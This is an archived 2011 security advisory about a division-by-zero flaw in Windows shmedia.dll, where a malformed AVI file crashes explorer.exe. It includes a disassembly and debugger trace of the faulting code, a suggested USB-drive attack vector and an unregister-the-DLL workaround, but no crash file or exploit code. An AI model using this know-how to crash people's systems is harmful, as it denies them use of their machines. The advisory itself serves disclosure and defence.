Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26048
HistoryApr 04, 2011 - 12:00 a.m.

Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS exploit .

2011-04-0400:00:00
vulners.com
11

Title :Microsoft Windows shmedia.dll Division By Zero,
Explore.exe DOS exploit .
Version :( Checked on XP SP All Versions )
Discovery : http://Garage4Hackers.com, http://www.fb1h2s.com
Author : FB1H2S aka Rahul Sasi[ Garage4Hackers.com ]
Twitter : @fb1h2s

Bug Information:

Class :Division By Zero
Impact : Could cause a Crash for explorer.exe when tried to be
viewed, listed using Windows Explorer.
Vendor : http://www.microsoft.com
Security Impact : Nil
DOS Impact : High
Remotely : Yes [Webdev]
Locally : Yes
Crash File : Attached

Bug Details:

The shmedia.dll module, serves as shell media extension for Windows, which
provides statistics and thumbnails for media files. The dll has also got the
ablity to acts as media file property extractor of the Windows
shell(explorer.exe) to extract custom attribute information from audio,
video, midi, and video thumbnail files including MPEG, MPE, MPG, ASF, ASX,
AVI, and WMV.

The shmedia.dll application calculates the bit-rate of the file and creates
a thumbnail preview for the Properties.So when a user open a folder
containing AVI,MPEG file extensions the Shmedia.dll loaded with explorer.exe
will automatically calculat the files details and make a preview of the
properties.

A Div by Zero bug is found when shmedia.dll handles malformed AVI file which
when viewed or explored produces a crash. No user triggering is required
except dragging the mouse pointer on top of files. Currently it is just (a
fun bug ) with causes just DOS condition. The only issue would be as all
applications uses windows file explorer to open a file (File + Open) all
applications would would crash when attempting to open this file.

Technical Details:
The GetAViInfo is responsible for reading the file information , a
prilimanary check is done to verify the AVI file headers to ensure the
presence of
right AVI headders. If returend true will move on to the file size bit rate
calculation and all.

###############################################################################
shmedia!GetAviInfo:
5cad6f8e 8bff mov edi,edi
5cad6f90 55 push ebp
5cad6f91 8bec mov ebp,esp
5cad6f93 53 push ebx
5cad6f94 56 push esi
5cad6f95 57 push edi
5cad6f96 ff7508 push dword ptr [ebp+8]
5cad6f99 bbffff0080 mov ebx,8000FFFFh
5cad6f9e e803f5ffff call shmedia!_ValidAviHeaderInfo (5cad64a6)
5cad6fa3 85c0 test eax,eax

Get AVI info function is responsible for calculating the file size and AVI
files bit rate
##########################################################################################
5cad6fa5 7463 je shmedia!GetAviInfo+0x7c (5cad700a)
5cad6fa7 33ff xor edi,edi
5cad6fa9 57 push edi
5cad6faa 6880000000 push offset <Unloaded_hext.dll>+0x7f (00000080)
5cad6faf 6a03 push 3
5cad6fb1 57 push edi
5cad6fb2 6a01 push 1
5cad6fb4 6800000080 push 80000000h
5cad6fb9 ff7508 push dword ptr [ebp+8]
5cad6fbc ff154c10ad5c call dword ptr [shmedia!_imp__CreateFileW
(5cad104c)]
5cad6fc2 8bf0 mov esi,eax
5cad6fc4 83feff cmp esi,0FFFFFFFFh
5cad6fc7 7518 jne shmedia!GetAviInfo+0x53 (5cad6fe1)
5cad6fc9 ff157810ad5c call dword ptr [shmedia!_imp__GetLastError
(5cad1078)]
5cad6fcf 3bc7 cmp eax,edi
5cad6fd1 7437 je shmedia!GetAviInfo+0x7c (5cad700a)
5cad6fd3 7e37 jle shmedia!GetAviInfo+0x7e (5cad700c)
5cad6fd5 25ffff0000 and eax,offset <Unloaded_hext.dll>+0xfffe
(0000ffff)
5cad6fda 0d00000780 or eax,80070000h
5cad6fdf eb2b jmp shmedia!GetAviInfo+0x7e (5cad700c)
5cad6fe1 57 push edi
5cad6fe2 56 push esi
5cad6fe3 ff15ac10ad5c call dword ptr [shmedia!_imp__GetFileSize
(5cad10ac)]
5cad6fe9 56 push esi

Once AVI file size is determined the function will move on and read the AVI
data streams
#########################################################################################
5cad6fd5 25ffff0000 and eax,offset <Unloaded_hext.dll>+0xfffe
(0000ffff)
5cad6fda 0d00000780 or eax,80070000h
5cad6fdf eb2b jmp shmedia!GetAviInfo+0x7e (5cad700c)
5cad6fe1 57 push edi
5cad6fe2 56 push esi
5cad6fe3 ff15ac10ad5c call dword ptr [shmedia!_imp__GetFileSize
(5cad10ac)]
5cad6fe9 56 push esi

#########################################################################
5cad6ffb ff7508 push dword ptr [ebp+8] #
5cad6ffe e8cffbffff call shmedia!ReadAviStreams (5cad6bd2) #
Our crash file contains Null butes which would be feteched.
5cad7003 8bd8 mov ebx,eax #
5cad7005 e85c3e0000 call shmedia!AVIFileExit (5cadae66) #
5cad700a 8bc3 mov eax,ebx #
#########################################################################

Division by Zero error occours here. When the Null bytes from the stack are
loaded on to registers.
#########################################################################################################
shmedia!_aulldiv:
5cadac40 53 push ebx
5cadac41 56 push esi
5cadac42 8b442418 mov eax,dword ptr
[esp+18h]
5cadac46 0bc0 or eax,eax
5cadac48 7518 jne shmedia!_aulldiv+0x22 (5cadac62)
5cadac4a 8b4c2414 mov ecx,dword ptr [esp+14h]
-------------------> Data from the stack got from the file, null
5cadac4e 8b442410 mov eax,dword ptr [esp+10h]
-------------------> Stack data,
5cadac52 33d2 xor edx,edx
5cadac54 f7f1 div eax,ecx
-----------------------------> Division by Zero Error

eax=0000001e ebx=03cc0054 ecx=00000000 edx=00000000 esi=01c6eb64
edi=00000000
eip=5cadac54 esp=01c6e6e8 ebp=01c6eb08 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
shmedia!_aulldiv+0x14:

Possible Attack Vector:

It is possible for an attacker to load few number of the crash files into a
pendrive and make the pendrive unusable, when tried to view file pendrive
contents will crash the user's explorer.

Recomendations: Quick Fix

A quick fix to this would be the unregister shmedia.dll till a patch is
issued.
Regsvr32 /u shmedia.dll

Rahul Sasi aka Fb1h2s
Info Security Consultant

www.fb1h2s.com
wwww.garage4hackers.com
www.garage4hackers.com/blog.php?8-Fb1h2s-blog


Rahul Sasi aka Fb1h2s
Info Security Consultant

07738222968
09320233681
www.fb1h2s.com
wwww.garage4hackers.com
www.garage4hackers.com/blog.php?8-Fb1h2s-blog